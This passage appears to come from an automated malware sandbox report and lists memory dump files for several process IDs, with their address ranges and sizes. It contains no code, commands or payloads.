                                • memory/5336-363-0x0000000000D30000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/5336-361-0x0000000000D30000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/5336-359-0x0000000000D30000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/5336-328-0x0000000000D30000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/5336-332-0x0000000000D30000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/5336-318-0x0000000000D30000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/5336-319-0x0000000000D30000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/5336-164-0x0000000000D30000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/5336-324-0x0000000000D30000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/5336-326-0x0000000000D30000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                • memory/5664-320-0x0000000000400000-0x00000000005A5000-memory.dmp

                                  Filesize

                                  1.6MB

                                • memory/5664-356-0x0000000000400000-0x00000000005A5000-memory.dmp

                                  Filesize

                                  1.6MB

                                • memory/5752-228-0x0000000000400000-0x00000000005A5000-memory.dmp

                                  Filesize

                                  1.6MB

                                • memory/6040-298-0x00007FFF1BC10000-0x00007FFF1BC20000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/6040-297-0x00007FFF1BC10000-0x00007FFF1BC20000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/6040-303-0x00007FFF19670000-0x00007FFF19680000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/6040-302-0x00007FFF19670000-0x00007FFF19680000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/6040-301-0x00007FFF1BC10000-0x00007FFF1BC20000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/6040-299-0x00007FFF1BC10000-0x00007FFF1BC20000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/6040-300-0x00007FFF1BC10000-0x00007FFF1BC20000-memory.dmp

                                  Filesize

                                  64KB